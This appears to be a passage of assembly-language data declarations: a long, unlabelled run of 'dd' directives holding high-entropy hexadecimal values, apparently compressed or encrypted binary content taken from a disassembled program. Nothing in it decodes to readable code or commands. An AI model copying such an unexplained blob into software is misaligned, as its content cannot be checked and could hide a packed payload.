dd 8A078B3Ch, 4D197CC3h, 50531405h, 6A2B9FBDh, 9926994Fh
dd 0A078A981h, 7D3BA6B0h, 0D27229F8h, 29361F46h, 157482B7h
dd 6C4943E9h, 290D5189h, 8D5201Fh, 128E916h, 91C16A74h
dd 0C7B7F83h, 0C0C06A6h, 0AC0D2BE1h, 0DE02DC3Fh, 0E8EB23D7h
dd 0C9FC5FE3h, 30F3DD44h, 0F77A2B33h, 0FEE0EE50h, 7702E681h
dd 933B0241h, 25E11FEh, 0EB0BA479h, 0F7AA20A4h, 0D3EF742Ah
dd 128D796h, 56155793h, 5F604EB9h, 70850FC6h, 81F399B8h
dd 0E856F875h, 0C5852E01h, 0B908A7A1h, 58CBF0D2h, 0B84DB37Eh
dd 88801E61h, 376563F4h, 0A93F1A50h, 689912BAh, 49C7119Ch
dd 1E579D41h, 0D4C1831Ah, 0D6750780h, 0C5A43D89h, 37A4E998h
dd 73C83B14h, 0F83933A3h, 0EB3B1805h, 0C01B1CF2h, 2D06234Ch
dd 88584947h, 14474021h, 96032963h, 0FF88B8BCh, 3E3286D1h
dd 0EB0E2148h, 0F852E834h, 25DE49E3h, 880F4029h, 5432C759h
dd 761B4B19h, 2B76DA44h, 5412D35Bh, 2981221Dh, 818D1850h
dd 2EB3441h, 925BF32Bh, 0A588F4D7h, 0A406742h, 995C8D39h
dd 8D179219h, 285A884h, 0E2158E4h, 8817048Dh, 73A60052h
dd 29110107h, 9EB8EC1h, 85D76183h, 8A1F1784h, 0E9973DEEh
dd 1203CAF4h, 0B3E80F7h, 3880028Eh, 3B10348Dh, 4373F300h
dd 0DB84188Ah, 3C305975h, 5E8E5839h, 0C11E3B80h, 0EB464304h
dd 73A48FF7h, 52BF924Eh, 0E92287BCh, 3999B763h, 82B53055h
dd 8F60994Eh, 0A005EBC3h, 0A903F3A0h, 0E89E7542h, 7C711DBDh
dd 7E73F70Ch, 68DF16F6h, 8A7609FCh, 676CF806h, 345EA540h
dd 43252158h, 1CAD0FF6h, 14B27858h, 34AC2B09h, 9929AA19h
dd 883101E6h, 0EBC22410h, 0C2052798h, 45291373h, 34726904h
dd 0AEEBF081h, 3C0C487h, 70A776F0h, 0C2221646h, 84D14156h
dd 0B8871688h, 0FC96B71h, 157AF021h, 52E52484h, 56E48321h
dd 5E0A8625h, 6942A466h, 80474005h, 3B0CF882h, 8D144D00h
dd 7618C77Ch, 0F2A19012h, 88C8072Bh, 0D40F0102h, 0EBE18C47h
dd 6573601Ah, 2D30729h, 548C8334h, 557728F0h, 3A114CD1h
dd 800A7305h, 3C40A38h, 18F41BC3h, 0B38A42B9h, 0F78B6A46h
dd 2B77D0B1h, 2776448Ah, 1473C32Ch, 9789FE39h, 66030638h
dd 0B43C8040h, 0EAF95F83h, 63AB9143h, 30D9817h, 0D3A5EC2Bh
dd 25D3DB8Dh, 0B2C33CA4h, 1A8AB24h, 76CEBA9h, 46FBD007h
dd 0A36F8C0Fh, 8A5AFE43h, 979BC10Dh, 0DB980DA7h, 0A42FBD34h
dd 0DAE58DEh, 0C3F61075h, 0FF26300Ah, 17E0201h, 1AF1E846h
dd 8DC39987h, 0C069E14Bh, 5EB1AC6Dh, 89DAC125h, 4C03DE30h
dd 0F02E07D1h, 0A032801h, 400C8D1Ch, 0FD4BADD1h, 2740C8CAh
dd 4D28033Ch, 0D190618h, 4F96DDC0h, 4F203A60h, 83A101h
dd 118C8D89h, 5581800Fh, 5E83927Ch, 1F2B4C20h, 0C43D0C63h
dd 2EC34541h, 0B8DC56A0h, 1CFE2030h, 4974594Dh, 780632AFh
dd 0C1A92FC8h, 0C2489454h, 985DD1C9h, 105E0646h, 0B582A82Ch
dd 5878F311h, 0EB226C40h, 740601F0h, 4668316h, 30106410h
dd 4C0256DBh, 63FE2408h, 884692FFh, 97281930h, 0EF24C0F5h
dd 0A9F602FCh, 2DC101FEh, 0FE812275h, 2974DFC1h, 2010C808h
dd 9EE7592h, 1A75F7AAh, 8656892Ah, 0F217A8B4h, 50F76066h
dd 74570108h, 809C645Ch, 8DF82B3Eh, 0E74CC48h, 491318B2h
dd 7DA0FF85h, 57102D7Eh, 7ED23BC1h, 4B20EDD9h, 543348EBh
dd 1624994Ch, 28E42625h, 3DA098FAh, 40F1FE1h, 0F5122085h
dd 0FCE16145h, 0CCA928B8h, 20D8CFF6h, 6A390D74h, 70DC7002h
dd 8AB53223h, 0C288EF84h, 0C16A1491h, 425FCE41h, 48167F53h
dd 5F2E8E39h, 54E9FA8h, 920FEB20h, 0D1D425E3h, 1CD177BDh
dd 421455C0h, 81115DD7h, 97024CC8h, 0C820771h, 5E57C933h
dd 1E8A043Ah, 10038646h, 0D006EC67h, 0F4128EDh, 0BF02074Eh
dd 0BAFB6957h, 0EB5312C3h, 0C4600D0Dh, 42140D15h, 0FD40EC86h
dd 47C02B8Ch, 7C20FB80h, 780AC013h, 0BE0F0E7Fh, 258AC33Fh
dd 7B2D72E4h, 30EA99E0h, 4C18420h, 0FDD7A25Eh, 7818569h
dd 0FC49800h, 0BA06E987h, 852409BCh, 0EACA6095h, 45479D5Ch
dd 81C8067Ch, 0FADC02D8h, 36D4FEFDh, 9749C5E9h, 0F5E88328h
dd 30A3B67h, 0F7142D54h, 7F481F1Ch, 0D1D1235h, 973FA6B6h
dd 270AFC74h, 447099Dh, 1639494h, 80248BCAh, 82A9FC1Ch
dd 50021E12h, 2AFB8179h, 25212375h, 4254046Fh, 85A98D07h
dd 5F8D0FDDh, 7FF73E33h, 51E933F5h, 2F128B1Dh, 10B1CBBEh
dd 134144CCh, 0ADE9EBD0h, 39537575h, 901E2140h, 4F8A202h
dd 0C105341Fh, 3B5E16E9h, 0E93FCC61h, 49380154h, 0A28BCA3h
dd 0ACFBC68h, 1411486Ch, 0E910BD77h, 9C092E05h, 54E1BC3Bh
dd 0D8F2107Eh, 207909A4h, 0F360CF45h, 14753A36h, 343B37D8h
dd 68460E1Ch, 92FD7BC9h, 0B6E92888h, 0C4653822h, 6507A34Ah
dd 6FAD414h, 0D0F6C39Eh, 7428017Fh, 0EC4A9619h, 2E5483E5h
dd 51C79D0Dh, 193C344h, 196D4346h, 2FB1AE88h, 4CE26DE9h
dd 67F82C58h, 82EB25B6h, 0C7651228h, 0CB8B9670h, 0EC243458h
dd 10FF113h, 0AD43E818h, 0A628EA12h, 69097073h, 0E01226Ch
dd 4041E85h, 0A205D985h, 66C40830h, 77E0C252h, 0B4BE4AFFh
dd 31FD74DEh, 1E46EE41h, 2205E429h, 8B08AC3Dh, 0C9A1C812h
dd 9D1A8A98h, 7528C985h, 7C45BB09h, 105D27ACh, 81C1CBD4h
dd 0D2854E05h, 1DF04298h, 38668366h, 5C15E6F3h, 0E732BE40h
dd 8010C044h, 162049C3h, 0C1CD4034h, 6EB4BD08h, 71B5316h
dd 62CDD3A0h, 6F84235h, 1490529h, 7909906Dh, 35208809h
dd 8A7755E8h, 0B491046Bh, 0C53822FDh, 6F01217h, 7E327DBBh
dd 0EB60C850h, 5AD52950h, 0ACE747Eh, 48C5A609h, 0D60271FCh
dd 0A47618A5h, 77C41FE8h, 56368859h, 4842F042h, 0E9F47E61h
dd 0EA43A11Bh, 0DC04FA89h, 0EE3265A0h, 0E2E0B612h, 8045F92Bh
dd 0C00F8982h, 0ABE8D118h, 0E7D347E4h, 0AEEAE91Ah, 2D6AB19Bh
dd 1F31EC3Dh, 0A2278A1h, 0E9509A67h, 0E8A2365Ah, 0D5671641h
dd 30D4543Eh, 55393595h, 35A7EF2h, 8B81CAC2h, 8964AFF8h
dd 559A324h, 0E839625Dh, 8589D791h, 74D07C18h, 0F88B0712h
dd 0FAEB0F4Eh, 48262C6Eh, 0B7EB9010h, 89082002h, 18F80985h
dd 0B44D3C94h, 4CB240ECh, 9000B84Ch, 489F7DB2h, 82E160ABh
dd 0E0B5ADF8h, 62E68178h, 0E746D80h, 23905D44h, 6C198FB6h
dd 89485937h, 0F6852A0Ch, 1A644311h, 481A2D3Fh, 0C9470185h
dd 148557DBh, 0E9E4A0DEh, 0CB20154Ch, 0B273D169h, 9D040512h
dd 0A0784255h, 0B1517407h, 0E0243EA2h, 2965BE30h, 4A2453B0h
dd 0A0C2E2B3h, 27CC22ADh, 2B3CEB05h, 2081D1C1h, 1A3201CDh
dd 39C97888h, 0E4A47413h, 0CCB3A0Eh, 0E94EF1C7h, 0F837A854h
dd 3EA90870h, 78A81407h, 91978024h, 5C740C10h, 0F8C6288Ah
dd 43018EAh, 2DC2451h, 0EBF58889h, 224C47C5h, 3A1F8408h
dd 54645509h, 488AB229h
dd 20923D03h, 6609B404h, 0D7443F8h, 5EB0889h, 100EA411h
dd 23DE9E1h, 40328863h, 69A90A79h, 0C747D82h, 421A3BA4h
dd 8341EB59h, 2621743Eh, 6165400Dh, 92F5E80Ch, 0D7015965h
dd 25EB99C0h, 0C53E9F1h, 0F2B5E7B7h, 0E8082170h, 0EB3C84D4h
dd 8CC28E0h, 1AD23328h, 0E31D7428h, 7C197F12h, 73178ABCh
dd 83790F13h, 0E00A4F93h, 6512DA09h, 0EBE4F581h, 111DB406h
dd 4757C04h, 129E38C7h, 934A227h, 11301ECAh, 0B8F7FC26h
dd 39898294h, 55279245h, 0BE004A3h, 2C84E4DAh, 0B399D2DCh
dd 3049576Ah, 76023EFFh, 90087FC0h, 0C73F741Ch, 0C799F010h
dd 0A8B7EEFAh, 0E8753FDCh, 0A088F06h, 0BF0D221Dh, 30C3BA82h
dd 1C881282h, 3952D872h, 24B26E7Eh, 0F40DCC5Dh, 1888CC8Eh
dd 0AFAFEB33h, 61B682Bh, 56029396h, 0B07412DBh, 3915806Dh
dd 74C47530h, 404B0D66h, 1C61A21h, 0AE043730h, 9F1FAEC8h
dd 5D8B0562h, 0EC3F6FCh, 0C7AB26EDh, 0A4A8CFF8h, 1468EB2Dh
dd 2B470B20h, 20F09B4h, 20920B68h, 0A401B848h, 2BD80E96h
dd 0F006B37Eh, 0AE0C323Dh, 56E0BA12h, 5EE8206Ah, 10B7222Ah
dd 0EA08128Ch, 58062BDAh, 1649FDECh, 74D85ABFh, 2C040A65h
dd 0E8383032h, 8A4143F8h, 65747430h, 82F00C41h, 0D30E3B42h
dd 487886A4h, 319F8FFh, 0D3BC9143h, 1B25E8B0h, 2DCBE69Fh
dd 0EDD0327Eh, 18795168h, 3EEBE88Ah, 4FC78B41h, 0F2D0DC53h
dd 20599B15h, 0F414F006h, 951ECDE8h, 740415C7h, 0B184A2A6h
dd 0D03D074h, 0E8122876h, 17E0DAA1h, 591CC965h, 54595AC2h
dd 180410B5h, 24AAF8BEh, 1355F2B6h, 0F4065ACAh, 4408599Ah
dd 19CC03B7h, 8943093Ah, 5B0F117Bh, 3A9EB104h, 49FF4D00h
dd 0F40E7804h, 0F8A5E11h, 18B02A4h, 0BEB6960h, 0E82DACA4h
dd 0C2C512Bh, 109FF883h, 0A05608B7h, 7CC35D0Fh, 24BB0834h
dd 7EBD6148h, 0EF092A21h, 0BE40D18h, 0E8140985h, 6B23EBACh
dd 2A3E9B0Ch, 2721071Ch, 99E2E37Fh, 0CD6A775h, 724BEDFEh
dd 7B266599h, 106D971Ch, 57063303h, 906D7D46h, 37755310h
dd 50363F21h, 6EE2416Fh, 0E183668Ch, 0A80BBFCFh, 0C690D64h
dd 9841046Eh, 0FC51298Fh, 0ED66471Dh, 0D0E7683Ch, 1054FC0h
dd 24F4F981h, 340C4B77h, 42BC0C6h, 527CEB41h, 2DC4C84Ah
dd 0F9C10F02h, 0D1DF8108h, 1FD44F6h, 812A5EF9h, 61FE6523h
dd 308B31CCh, 6A26FDCFh, 1C372E02h, 95CE3D78h, 0AAC0B5Dh
dd 4B2125Ch, 89937551h, 0B4E8180Bh, 0E44E561Ah, 0A8558602h
dd 230A451Ch, 12E90CD2h, 0E22BBE4h, 0C80B034Ch, 295F0D48h
dd 0F70BA009h, 0B4007CE1h, 1F01C40Ch, 0A64921Eh, 470A0322h
dd 5BD383E1h, 2B63742h, 0E4803D83h, 5810FD40h, 20BD1D75h
dd 0F41F8B1h, 22AA4E8Ch, 0A1045A2Ch, 20C0455Eh, 176AF2E9h
dd 0DCF8085Dh, 3B008F90h, 257D5EDFh, 0E8973539h, 970B7E84h
dd 14FF5B61h, 0A8208BEh, 0C62358E1h, 0E17BA957h, 15D16597h
dd 2A141346h, 40F8F8C1h, 74814AC8h, 0AE986E6h, 8802248Ah
dd 95D85EEh, 68F82758h, 0C68BB831h, 0FAD9102Fh, 0A4030050h
dd 0D6D2FFF6h, 5992179h, 221B02E8h, 740220FBh, 6AF1F0AEh
dd 0C128E06h, 0FD0D0DEBh, 775A08DAh, 490B0A07h, 8DCC6A98h
dd 0F6FF423Bh, 0F94E6C9Dh, 0DE09EA47h, 1BFB6A44h, 54AA49D8h
dd 55C8BA7Dh, 420AD900h, 0D1EED938h, 0A9C9843Dh, 75011351h
dd 57D80BEDh, 10E3A350h, 912DE56h, 2D6BF0Ah, 0FA8D34Fh
dd 70F0CB27h, 0F183F909h, 9F0BD6FFh, 0ECC693CFh, 0E18113DAh
dd 750A0CADh, 807251Ch, 0F34FD374h, 0E69AA81Eh, 0C4C9C08Dh
dd 5B5F345Eh, 421881EAh, 35C22EFCh, 0B8075D36h, 84DC87EFh
dd 0D009BA27h, 324C74E7h, 0DC241527h, 0D4860648h, 8C5C96EBh
dd 0D0FEEAB2h, 0FD230770h, 0D496FC10h, 3501C8CAh, 7F20014Eh
dd 0C420840Fh, 0E8588B13h, 15166467h, 5C40B56h, 60A46A0Eh
dd 588C9008h, 11AB0DE9h, 0F65F34CEh, 4B982DC8h, 8674BE4h
dd 0CD5572Eh, 9770AC4Ah, 0A9C858E0h, 327D181Eh, 0D1C1518h
dd 560BD103h, 17DCA3Bh, 2B4934FBh, 0B50A12EBh, 83CD46A8h
dd 0C6040626h, 0F7754A0Ch, 2435F2D1h, 8E3D498Ch, 0D4C5C068h
dd 0D0C05C7h, 14EB8383h, 13903D70h, 5D1081B2h, 0C891433Dh
dd 3D4A4184h, 85210F93h, 8D3D3704h, 0F284823Ch, 0C88F433Dh
dd 3D114186h, 8C0A0892h, 0A6FF8A44h, 0B06A5E89h, 89555961h
dd 0EB5EDC0Bh, 51FB48FBh, 0B04A25D2h, 614BE4A3h, 0CC7BEBECh
dd 0A141582Fh, 0E24FF66Ch, 200D18BDh, 5415395Fh, 5056DAA0h
dd 0A47406B8h, 0E4EC8BEEh, 2B0CC021h, 39044C05h, 8DF559C1h
dd 0DD5E49E8h, 2816A808h, 5E13C13Bh, 0E0D31374h, 29BD50DDh
dd 8357493h, 0C0261ED5h, 5D1F489Ah, 7522A8C0h, 33A1255Ah
dd 0D11053CBh, 0AFAE112Eh, 681AEDC1h, 46E6C027h, 6680E3EBh
dd 100D443Eh, 203C0A07h, 1AFD0676h, 97FA77D8h, 4748023h
dd 74E92127h, 5056A5F6h, 5B1D390Ah, 0B8B27126h, 2EB62D79h
dd 5D3337D2h, 121D5CE6h, 1003D3Ch, 0BDE85647h, 0B554B2D5h
dd 0EB8F4F0Fh, 79049F7Dh, 18B0A24Fh, 8B28CE77h, 3B5912F0h
dd 200A0DF3h, 92013A65h, 0DCFBE809h, 403D8B11h, 741F3842h
dd 0CDE5395Bh, 838B759Dh, 3F804559h, 5522941Fh, 776B42DAh
dd 5206DE69h, 6112CC2Fh, 7DE4365Bh, 0F813D3D6h, 3307D65h
dd 0C97570FDh, 854CFD5Dh, 0D4CE31E8h, 471D892Fh, 851E650Ch
dd 4C880A59h, 0BC24A5AAh, 91F6ED5Bh, 0DCBBB3BEh, 599CBE06h
dd 47494497h, 2AA12456h, 3011A348h, 38FE8B04h, 5BDCBC18h
dd 0CBEE371Ch, 0B7AFE6Bh, 0CA444DE8h, 0AD91F85Bh, 0D5418804h
dd 7E09CDA2h, 0D711B484h, 29F448A2h, 3023A22Ah, 4AAE82Dh
dd 0DA8AF786h, 0A73617E8h, 0B648D6A6h, 9D031845h, 950FDEA3h
dd 9A37F81Bh, 83FB3A18h, 122183C4h, 0E410754Ah, 0B6A6C7A5h
dd 0F89D2192h, 4F89E864h, 0D7DBA137h, 38802A12h, 8A449C00h
dd 0F2400150h, 4EBF90FAh, 25A5A029h, 0F6EABF90h, 0F3E18219h
dd 60F20490h, 0F985013Eh, 58A7120h, 46168810h, 0D50C4840h
dd 0A2CEEB62h, 0C380040Dh, 4118E51Eh, 0A943EB3Ah, 1F560512h
dd 8A40670Ah, 6983E4DAh, 88183483h, 0CD4B461Eh, 0CD6EE4E8h
dd 75B9129Bh, 34207CCh, 22BC6248h, 0F0FF664Bh, 0F118702Fh
dd 0E038117Dh, 2C8AA041h, 69280551h, 0C8184413h, 1FBD348Ah
dd 9E14558Bh, 84D1A802h, 586A3D8h, 4755C46h, 425BF840h
dd 892C2793h, 2970975h, 407D3942h, 7C800D6Eh, 8D222878h
dd 8B3CC1E4h, 9203EBC2h, 0D440870h, 19C0D233h, 7E940F18h
dd 0D10CC0C2h, 4BD38BEBh, 0E0A7FB6h, 0C6408943h, 0A0465C06h
dd 51754BB2h, 0A81181F3h, 80B8834Ah, 8B0A527Ch, 3AEA3F22h
dd 6C942FB5h, 0A719532Eh, 650692E3h, 0F1C6220h, 39B4147h
dd 3B047A2Dh, 2EA58E9h, 207F5331h, 0F1751h, 278303C8h
dd 144A8F92h, 0C4D4AD12h, 0A0A14A80h, 536AC9E5h, 0AC2DBC02h
dd 0F4DCABDFh, 0F63A3910h, 7532A94Dh, 92FDD50Ah, 0B17CA07h
dd 4C114422h, 0B02F5928h, 0FB9264F1h, 25EA180Dh, 88021C08h
dd 0AC968FE9h, 8DBB0144h, 0C442480h, 50C840A4h, 396685C2h
dd 0E74841Eh, 123840ECh, 0F9527518h, 2BF20B07h, 0B43006C6h
dd 0F8D1269Fh, 6693B8Fh, 7F085E0Dh, 0FF34CE80h, 0B36B0D7h
dd 3274EB3Bh, 0CB0F3302h, 0B2A5833h, 553A2331h, 0DBA52B50h
dd 665E4DA5h, 0B1B0E46h
dd 0D1A6E810h, 995C2811h, 56098B14h, 0A122757Ch, 53EBC312h
dd 4C287BFDh, 1C8682A6h, 3C742CB2h, 0A84F3C61h, 0BEEF7E51h
dd 0F605D0F8h, 0B1F92B7Eh, 0CAA8CED6h, 0AB51CF67h, 0BEBFC01h
dd 0F630BB61h, 85F5D347h, 5C9AE089h, 3EC651A1h, 88AE4734h
dd 0EC2F8344h, 0FD694A44h, 6DE89190h, 0C6BC3BA4h, 0C51B6A8Fh
dd 8D22D8F7h, 0A84C7435h, 7D65ED19h, 9F0286EBh, 0B76E01Ah
dd 0D2801A09h, 0C6B780DDh, 0A051446h, 0F47C24A1h, 1C40F508h
dd 0AA8DE2EBh, 9AB175E2h, 826E66h, 0C5766942h, 0CA2C8D3Fh
dd 0B9917BF4h, 4C07F84Eh, 28B838DDh, 1CF44B08h, 27C2E18h
dd 0A03539EEh, 34527D64h, 619B24BFh, 2AC9DD90h, 3874B420h
dd 0A80AC83h, 888D0789h, 73C1817Fh, 12608018h, 5400408h
dd 8BD0F8Bh, 4D7DC12Ah, 4A42D6E4h, 7BBB7C1Fh, 4D0A8B2Ah
dd 7E1F3833h, 0BD031646h, 8A361784h, 3FC2912h, 0A617F48h
dd 520B7508h, 6655A0A6h, 0C7D1A1A9h, 7D3BCFC9h, 890BE840h
dd 88610863h, 4547D848h, 9C37583h, 0BA7CFE3Bh, 0C4ED5188h
dd 8D1D813Ch, 4D75D034h, 1DB8524h, 8081040Bh, 58F66AB5h
dd 0C389A0EBh, 9D359048h, 92F56B49h, 0A937A4B3h, 7405C2CAh
dd 67725717h, 424C760Ch, 0D1443E89h, 4E800616h, 0EB166B12h
dd 0A3339B9h, 0EDDF0817h, 8343E40Dh, 7C03FB05h, 0B936FF9Bh
dd 0F9A84A6Eh, 4BE94EEh, 68A1C344h, 823A94B5h, 30690DDCh
dd 443DE42Ah, 7EF4BA4Eh, 0FC683121h, 8918E8A5h, 0A5A4A10Bh
dd 64BB59BEh, 0E86809D9h, 3B59CB91h, 72A4AD32h, 908F4ECh
dd 30B8C933h, 313BC061h, 52476B83h, 1B4C3D41h, 56F11C72h
dd 0E6C1C18Bh, 44963B03h, 1CF3831Bh, 506D5746h, 238BE8AFh
dd 66AD0DE3h, 0FA8128B4h, 0F118C876h, 5C858D84h, 996ACABAh
dd 184C1363h, 80A57F50h, 0D05A64E8h, 8F13CD50h, 0BD14FE57h
dd 2FE80C08h, 0BC400ACFh, 763C058Ah, 501A2629h, 36271C6Ah
dd 83160E21h, 36A3907h, 4C68A61Fh, 27577C85h, 0E47C1852h
dd 21FF60C3h, 0E9130ADh, 0A86F1142h, 0E20D11AAh, 1EAE2C68h
dd 0B62A7E11h, 1784D434h, 0BDEE24CCh, 20101468h, 0B4D01101h
dd 50672844h, 2D2C5A17h, 0A5D2EB5Fh, 6A3153E7h, 0CE042E4Ah
dd 135BCE8Fh, 0CF4CF4F2h, 149CD6A9h, 6A3609FEh, 1A8E1A75h
dd 0B33DF04h, 929ABAE4h, 8A94905Ah, 77278D1Fh, 0B5D7D801h
dd 0C3109E67h, 69A2248Dh, 0CEBC7FDBh, 0CA6A2ACDh, 80052F9Eh
dd 80D0EBF2h, 6D2D6BFBh, 4D1F0550h, 5990214h, 16B62B1Ch
dd 0B3BC2731h, 8C9C4326h, 9E630157h, 94FAD84h, 7A8F2424h
dd 7B396A4Dh, 255EEEC6h, 0F5637430h, 32110AEAh, 78265C3Ch
dd 582A3A32h, 25084213h, 631C781Fh, 17750639h, 12545375h
dd 63820420h, 15ED0F3h, 5F64A246h, 0F7D2E823h, 3BF10C0h
dd 14B1A9D2h, 166EBD1Dh, 0CF1AB80Ch, 30FF0E67h, 2C0F3BB9h
dd 30E946CBh, 17EC85E2h, 3C794A0Bh, 8B66702Bh, 0C72358C6h
dd 884A4F57h, 17418057h, 68E9183Ah, 8DA03B37h, 89F3673h
dd 89FEE06h, 72F49D3Bh, 840CA9BDh, 29585E49h, 66602D05h
dd 1CC5AF0Fh, 0FBACF103h, 0A0AF174Bh, 18168A09h, 6AAD64E9h
dd 0AC78386Bh, 64936295h, 0E5105BCFh, 0CFD62FAAh, 3582A43Eh
dd 862A4DEBh, 7F164B64h, 0F35D1C75h, 0E109756Ch, 0D0060902h
dd 9E58B61Bh, 3F416777h, 9032F2Ch, 0A9F62776h, 0E1710114h
dd 22D4F43Eh, 0E17435CDh, 66EB2860h, 6080B511h, 1BD9F60Bh
dd 27BD5EC9h, 9BF88F61h, 0D3F905BBh, 90616902h, 0F8582070h
dd 44894BECh, 0AE08DE2h, 2C84F7Eh, 9F7B38EBh, 0CB50532Dh
dd 8D730F4h, 217C7088h, 98886FA0h, 0C1CC570h, 0DC29B008h
dd 0DF3E09DCh, 88F830B2h, 88E87042h, 33A47046h, 0F327F40h
dd 2464096Ch, 9154485Ch, 4544224Ch, 308A7E3Ch, 704288ECh
dd 0A032F142h, 0C024AC09h, 0AA30E957h, 0B15020CFh, 0C41A71D0h
dd 20317128h, 32381372h, 80095819h, 0D430F42Bh, 5187207Ah
dd 4835EA20h, 4CD4655Ch, 0E409DC80h, 0F412EC89h, 44CFC24h
dd 7EE9173Fh, 58FD30CAh, 0DCC3020h, 89480938h, 2BFA155Ch
dd 8BAA430h, 412FE602h, 453FE81Ch, 905FFB5h, 107FC30Eh
dd 2ED3373h, 68FFCB83h, 0D9FAA5A8h, 4B2D893Ch, 1D9FF01Dh
dd 2206DED4h, 0F8E81A58h, 0FC725E13h, 850FF512h, 6B68B7B4h
dd 80DC43B0h, 0FC33B60h, 0D4125A84h, 8B130340h, 0A54E040Dh
dd 660664ACh, 21F62D39h, 5A016A09h, 8909C8A3h, 7452A115h
dd 75F1F942h, 0A862E8C2h, 4A47142Ch, 1B745BC1h, 0F8F58A1h
dd 1223C53Bh, 5015C12Bh, 2F40DDC4h, 0EB2BC9A3h, 0A32D2D20h
dd 8A0C7E10h, 8B2DFD72h, 7D09A935h, 0BF3FC381h, 0FFE99F20h
dd 0D9D4CD5h, 0BBB46853h, 9080082Eh, 83EAF6A5h, 6C391174h
dd 0A1E55840h, 60801EA0h, 8923F65h, 0A8200B22h, 5A373F45h
dd 8883A6Ah, 0CB02DAE6h, 3E08013Fh, 0A295E820h, 9850A1CDh
dd 0DE2FE942h, 823E531Dh, 17852699h, 11B2625Ch, 847582F7h
dd 948A50C4h, 32D9251Fh, 1B0396B4h, 66C737E8h, 0DA9362Ah
dd 70FA50FAh, 2526C05Bh, 1CA35160h, 20E4509Ch, 0AB2E5662h
dd 36A03C8h, 0E5C467CDh, 433BACCDh, 865358A5h, 0EDE814C4h
dd 0AB2DDF96h, 4601EA03h, 6F94185Fh, 30B3CBC9h, 69C88B1Eh
dd 1C0E104Eh, 86F28917h, 2B61004Ah, 0C33A0874h, 13077C3Ch
dd 8EE7F39h, 4E47EF37h, 8A415C8Ch, 8B5944A2h, 0DE0827ABh
dd 512BC82Fh, 892308F3h, 286E1416h, 0C4FD3B1Ah, 1912AA62h
dd 0C4228176h, 742A91A4h, 43ACB91Ch, 1014E812h, 0E3502774h
dd 566C94B6h, 54202735h, 1075694Dh, 5139FF3Ch, 0C83E373Dh
dd 2FB44C3Fh, 0D9DB88A5h, 46C25B1Dh, 64053B14h, 0C75325Fh
dd 702B6810h, 5A3DDAF0h, 18CE2D44h, 127610CCh, 46560DB7h
dd 2A665135h, 218B4878h, 1132541Eh, 8503952h, 151D6475h
dd 13574A4Ch, 0C81B4E14h, 5350404Ah, 14AC14EBh, 69155753h
dd 50817F4Ch, 41010EE8h, 14020560h, 0C599A5E1h, 0B850EFF4h
dd 8024525h, 0FC1099FEh, 28750841h, 28F81591h, 0FA531357h
dd 12F6211Bh, 2FCFE8FFh, 5D8FB57h, 6242EB2Ch, 209B571Fh
dd 4F211FC5h, 218DDEBh, 8CE026Ah, 7004A953h, 90E83458h
dd 4712375Fh, 220A6505h, 58187B44h, 5C15248Bh, 6CA18D0Eh
dd 1C4EEC0Bh, 7DD03B0Eh, 0FCA811Eh, 0BA68BF8Ch, 28C8787Ch
dd 3708B78Fh, 0C2287ECAh, 93771A7Dh, 3114A6D0h, 7F24F67Ch
dd 87E01F2h, 2B952A42h, 49289F8h, 4104C4A1h, 0EE690606h
dd 4086B57h, 330F7538h, 606C82C9h, 95C19D10h, 8A58B63h
dd 9C46700Fh, 49EF5A1Ah, 0C7897D66h, 100B5556h, 89010756h
dd 25A2508h, 65831AC7h, 0F072853Bh, 0E6C15181h, 0A0866370h
dd 0A909EB2Eh, 6517A40Bh, 845A8D3h, 0BC6DD269h, 57FF4383h
dd 300BF8C1h, 8F076AF9h, 3A84A1C9h, 87409C25h, 0EBF7995Fh
dd 0C1188A9Dh, 7F1C553Bh, 78B400Eh, 37EC22Bh, 0CFC03BF5h
dd 0AC0AEBF9h, 0C179900Eh, 750518EAh, 100C9338h, 0B61444A9h
dd 6326174h, 3B20A810h, 1F207ECEh, 0D507E983h, 0B44A891Bh
dd 0CF009BEh, 34818553h, 7F061307h, 6404D03h, 7501087Dh
dd 244C422Bh, 633751A7h, 28AA653Eh, 0C62B8D4h, 14FDB32Ch
dd 0F9A33012h, 4855EB85h, 55A6C2Bh, 62C90506h, 66402B0Fh
dd 0C0D4C79h, 15265C1Dh, 0EB080D49h, 3B41BA11h, 0C22F7CC2h
dd 13A841A5h, 299A4B46h
dd 51BD0B55h, 3B530964h, 0F6245351h, 0AF6C731Ch, 0C13F3528h
dd 0E68383F9h, 953C8D1Fh, 0B78DDF5h, 0F60F8B00h, 1043144h
dd 1601745Dh, 63D41002h, 0FE847FC4h, 92225F3h, 0CA4FEB2Dh
dd 166D71Ch, 981115B6h, 0FB0EC25Bh, 7E255D7Eh, 61526966h
dd 962E1B2h, 70EE37Ch, 8B20F059h, 640B8007h, 8DFD0430h
dd 12A0AD8h, 258314D0h, 5295B8FCh, 0F0C49351h, 98BE2284h
dd 44114ACh, 3BF1D13Eh, 0FA2580Dh, 1798317h, 0F139F4F2h
dd 88A6F8A9h, 9353851Ch, 0A8A32F8Ah, 52570804h, 7310A9E4h
dd 0DC05BF89h, 0C38DF0h, 7420A814h, 0BBC0C4Dh, 7108E851h
dd 1464B78Ch, 0F0CAFC6h, 99C16480h, 330C9437h, 8FC4076h
dd 0E7860F17h, 41ECCCC8h, 0FCFC8EFBh, 690C6B2Bh, 17AD2997h
dd 80096E20h, 0AAD80AF9h, 0E0C6F014h, 8840160Dh, 148DFC08h
dd 42A958Dh, 0F981CA2Bh, 0CC8020EBh, 3CA4F88Bh, 0D7102B69h
dd 500A5B8Eh, 558D490Eh, 3034D8E4h, 126A38BEh, 0F4E64398h
dd 69409D01h, 34B67CC7h, 3ED8CA37h, 8A72108Ah, 14D13EBAh
dd 28DECC21h, 74080592h, 586C835Fh, 0ADF45C2h, 0A3712274h
dd 0E92F3222h, 63B27AEAh, 0EB08B600h, 4D7B8DC7h, 9F7DCA2h
dd 85A5F2EFh, 450B1165h, 0F84485D2h, 2D28A7EBh, 0FB22B59Ch
dd 8F0A0D54h, 24953D14h, 409239F6h, 8202EAC4h, 411A3880h
dd 8B65CD0Eh, 881C6C08h, 6DA03D89h, 0A0A116EBh, 0B1AC26F0h
dd 5D8C3C9h, 9D82B864h, 0E81256E6h, 0A194BA33h, 0C068D0AAh
dd 0C0A04189h, 493B830Dh, 0A8C73C0Ch, 91901C18h, 8D041BC7h
dd 74A20EDBh, 93934A13h, 0B4144B8Bh, 14C89E0h, 8A61D28Bh
dd 536B0372h, 0E06404E6h, 0C48CD41Fh, 47898D36h, 2204C6DEh
dd 0A1C3401Ch, 6A561B30h, 5EBAC914h, 0C2D9850Bh, 3B057926h
